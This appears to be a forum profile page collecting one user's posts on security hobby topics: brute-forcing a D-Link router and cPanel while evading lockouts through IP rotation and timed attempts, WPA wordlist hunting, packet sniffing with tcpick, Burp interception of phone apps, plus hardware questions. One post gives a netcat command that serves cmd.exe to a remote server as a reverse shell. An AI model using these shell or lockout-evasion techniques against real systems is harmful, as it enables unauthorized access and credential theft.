Jump to content

i8igmac

Dedicated Members
 View Profile  See their activity

  • Posts

    939

  • Joined

  • Last visited

  • Days Won

    22

 Content Type 

Posts posted by i8igmac

    Help please! Bruteforcing a DLINK DSL2750U ADSL Router with Hydra

    in Everything Else

    Posted

    Maybe your wordlist file has issues? look at the tcp stream for ugly characters in the password/user string...

     

    understanding the firewall is like poking around with your eyes closed. this firewall if it even exist or provides any brute force prevention, may respond in several ways... 

     

    Below is a video of a custom brute force I built to crack cpanel... from lfi to brute force... some firewall functions I experience... I instlled a cpanel OS in vm, I expect most admins will rely on the default firewall settings/functions of the installed software...

    A service may respond with a header 401=unauthorized, 403=forbidden or 200=ok... look up http status codes...

     

    I started off by creating a password... I tested 9 failed logins and the 10th was the correct attempt , but the header still responds with 401...

    So, this basic firewall function will detect a username fails X times in a row and too quickly... so the service continues to respond with the same 401 header a total of 10 times in a row... the attacker will think its password list was missing the correct creds witch I thought was clever!

     

    So I changed my local ip address from 192.168.0.100 to 192.168.0.101...

     

    now i made 8 fail logins with the 9th being the correct credz...

     

    I repeated this process until I reached the conclusion that if the correct creds was on the 6th attempt I would receive a 200 header response...

     

    There is a identical process that I used to find the TIME-in-between fails that triggers ip banning was around 60 seconds. I would need to sleep 60 seconds before each login...

     

    I could ramble on with all my findings, ill try and get to the tactic I used...

     

    change My ip after each request. With my attack I also changed username every attempt but that wont work for your situation...

     

    I had planned on creating local proxy service that would provide a new ipaddress after each request.

     

    everything I ran into required so much extra evasive function I had to build my own tool for the job...

     

    you should continue with hydra. but start thinking about what security maybe implanted...

     

    I had scraped a huge list of default router passwords but I don't know where it is...

     

     

    Edit:

    the feeling of super saiyan level 5

    Help please! Bruteforcing a DLINK DSL2750U ADSL Router with Hydra

    in Everything Else

    Posted

    Maybe your wordlist file has issues? look at the tcp stream for ugly characters in the password/user string...

     

    understanding the firewall is like poking around with your eyes closed. this firewall if it even exist or provides any brute force prevention, may respond in several ways... 

     

    Below is a video of a custom brute force I built to crack cpanel... from lfi to brute force... some firewall functions I experience... I instlled a cpanel OS in vm, I expect most admins will rely on the default firewall settings/functions of the installed software...

    A service may respond with a header 401=unauthorized, 403=forbidden or 200=ok... look up http status codes...

     

    I started off by creating a password... I tested 9 failed logins and the 10th was the correct attempt , but the header still responds with 401...

    So, this basic firewall function will detect a username fails X times in a row and too quickly... so the service continues to respond with the same 401 header a total of 10 times in a row... the attacker will think its password list was missing the correct creds witch I thought was clever!

     

    So I changed my local ip address from 192.168.0.100 to 192.168.0.101...

     

    now i made 8 fail logins with the 9th being the correct credz...

     

    I repeated this process until I reached the conclusion that if the correct creds was on the 6th attempt I would receive a 200 header response...

     

    There is a identical process that I used to find the TIME-in-between fails that triggers ip banning was around 60 seconds. I would need to sleep 60 seconds before each login...

     

    I could ramble on with all my findings, ill try and get to the tactic I used...

     

    change My ip after each request. With my attack I also changed username every attempt but that wont work for your situation...

     

    I had planned on creating local proxy service that would provide a new ipaddress after each request.

     

    everything I ran into required so much extra evasive function I had to build my own tool for the job...

     

    you should continue with hydra. but start thinking about what security maybe implanted...

     

    I had scraped a huge list of default router passwords but I don't know where it is...

     

     

    Help please! Bruteforcing a DLINK DSL2750U ADSL Router with Hydra

    in Everything Else

    Posted

    ill provide 2 commands you should run in 2 seperate consoles. First install the tool... `sudo apt-get install tcpick`

     

    Console 1

    Sudo tcpick -i wlan0 -bPS -C

    console 2

    sudo tcpick -i wlan0 -bPC -C

    It will help if you close down all applications that maybe streaming data... 

     

    now submit your login from the browser, both screens should now show your Post request in one console and your server response in the next consol... press ctrl-c to stop the stream's and paste this information in 2 separate text editor...

     

    You may already have this information. But now you have 2 consoles that you can use to quickly see a separate live stream ... keep at it, first you have to focus on getting hydra to produce a proper post request and see a identical server response...

    Looking for: 13GB (4.4gb compressed) - WPA WPA2 Word List - 982,963,904 Words

    in Everything Else

    Posted

    2 hours ago, barry99705 said:

    For the most part, the tables aren't really that useful anymore.  Computers and GPUs have gotten fast enough now that throwing the Webster's at a handshake doesn't really take that long.  One of my bigger lists is this one. 

    https://myexploit.wordpress.com/rocktastic-v11-one-billion-one-hundred-thirty-three-million-eight-hundred-thirty-nine-thousand-four-hundred-sixty-three-unique-word-combinations/

    Thank you so much... thats a improvement... how long did this take to generate?

    And what kind of gpu?

    Looking for: 13GB (4.4gb compressed) - WPA WPA2 Word List - 982,963,904 Words

    in Everything Else

    Posted

    1 hour ago, barry99705 said:

    You have to remember, render's password lists were generated in the early 2000's.  Laptop's at the time would take hours and hours to generate the rainbow tables.  Desktops took hours to generate the rainbow tables.  I helped out with some of the beta testing of cowpatty back then.

    its time to make  improvements : -)

    there have been so many recent data breaches that if the information is publicly available, we need to filter threw!

     

    Yahoo breach estimated 1 billion users data stolen... target and home depo also come to mind...

    Looking for: 13GB (4.4gb compressed) - WPA WPA2 Word List - 982,963,904 Words

    in Everything Else

    Posted

    This is a pre computed hash table... if you took a packet with the ssid of  'HOME-AB01' and encrypted it with 170,000 passwords, you would thin have a pre computed hash table saved to a hard drive... This would take my labtop about 11 seconds to generate, once completed then a lookup is only 1 second...

     

     

    There is a 170,000 password list hashed by 1000' ssid's...

     

    There is also 1million password list hashed by 1000 ssid's...

     

     

    I am interested in download links for wpa word list. There has to be a updated version. There have been so many huge data breaches lately...

    Netcat Reverse Shell Invisible Payload Fast

    in Classic USB Rubber Ducky

    Posted

    Netcat. The tcp swiss army knife... there is so much you can do with this...

     

    You can perform attacks like this with out port forwarding...

     

    For example, your web browser can connect to google with out port forwarding. Netcat can do the same

    `nc google.COM -p 80`

     

    Netcat is used like a pipe... shuv data down one end of the pipe and the other side can see it...

     

    nc your.server.com -p 88 -b cmd.exe

    If your webserver or your machine is properly port forward then all should work.

     

    Reverse Tcp netcat shell.

    facebook vote for president... wikileaks...

    in Community Projects

    Posted

    this may not be the place for this toppic. But I have a idea...

     

    There maybe a rigged voting system. I was thinking about creating a online vote booth, with hopes to insure only a single facebook user could submit one vote...

     

    If I was to create a online voting system with triple capcha authentication. I could try and spread a link on facebook in all 50 states. (I have a method/function for this)

     

    A simple database to store the information...

    (User-id

    User-state-location

    User-vote)

     

    What do you guys think. 

    web intetface. live console output.

    in Questions

    Posted · Edited by i8igmac

    wavemon.png

    Wavemon example console application.

     

     

    mtr.png

    mtr example console application.

     

    Im looking to create a webpage that will display the output of several console applications. Wavemon will show wifi information and mtr will show advanced ping information.

     

    I hope there is a simple package i can start with

    thin mini itx SoC. 10-1 power switch mod

    in Questions

    Posted

    On Saturday, October 01, 2016 at 5:41 AM, blublob said:

    When it is off:
    short 8 and 6 for a split second, and it should begin to boot

    When it is on:
    short 8 and 6 for a split second, and it should begin the shutdown process (depends, but usually this is the case)

    When it is on:

    short 8 and 6 for like 4 second, and you will do a forced shutdown, if you keep it shorted it'll loop:

    boot -> forced shutdown -> boot -> forced shutdown...

    You are On point. I pulled some led's, power and reset switch off a old puter...

     

    I tested both switchS for Continuity and pressed the button, onlly holds continuity for a moment... both switch seem identical in that aspect...

     

    Now im Onto a new problem, it seems bios has a black list for mini pcie wifi devices, my machine wont boot with my Atheros chips Installed. Almost need a new thread for my struggles ill run into. Cheap 12$ small chips Qualoccom Ar9462 Ar5b22... 

     

    thanks for your reply. 

    thin mini itx SoC. 10-1 power switch mod

    in Questions

    Posted

    13-132-732-09.jpg

     

    my Asus thin mini itx SoC Has arived!

    this is my budget build.  I hope to save money by avoiding the purchase of a itx case.

     

    so now i have a question about the chassis 10-1 pin connector.

    This 10-1 pin connector will provide the case a button for power, reset and a running led.

    can i just grab a toggle switch to power this baby up?

    burp suit cert installed... snapchat/facebook app

    in Questions

    Posted

    iptables -t nat -A PREROUTING -p tcp -s 192.168.96.75 –dport 80,443 -j DNAT –to-destination 192.168.96.70:8080

     

    my setup is a home built debian based router with iptables. So running the above with a masquerade command will force the source ip(phone) to the destination ip(labtop)

     

    snapchat app was just cut off the data response witch seems to match the description you explained...

     

    However, the Facebook app was functional, no errors on the phone... but burp was not showing any data stream but some alerts and warnings that maybe burp suite decided to allow the traffic threw... I should have took a closer look at the traffic... seems like hsts stream(just a guess)

    burp suit cert installed... snapchat/facebook app

    in Questions

    Posted

    I was board this last weekend. I felt like sniffing some data from my android phone.

     

    So i installed the burp certificate on my samsung s3, witch forced me to setup a pin or password lock on my phone. If you manualy install custom certs on the android then you are forced to use a pin/password to protect the phone...

     

    So, setup some iptable rules to force the traffic on my phone to pass threw a transperint burp suite running on my labtop. 

     

    I first tested the phone webbrowser and worked very well, no obnoxious certificate errors (as expected)... but when I tried to sniff the snapchat app or facebook app it was a nogo...

     

    Any ideas for sniffing the snapchat app or facebook app? Has any one tried?

     

    I removed the pin/password from my phone and reconfigured a simple swipe phone unlock. This automaticly deletes the cert I installed from burp...

    How to make self-pruning word-list?

    in Security

    Posted · Edited by i8igmac

    i have just watched a hak5 episode that includes a guy/company (not sure of the name) he has cluster of gpu capable of cracking these 8char passwords in 5 hours or so.... not sure how many video cards, 7970's that cost right now $772.66 each

     

    he has invested at the time of this video about $30,000

     

    maybe he can chime in on the conversation... i would like to chat with him... maybe he can be found on irc?

     

     

     

     

    and the second part of the video

     

     

×
×
  • Create New...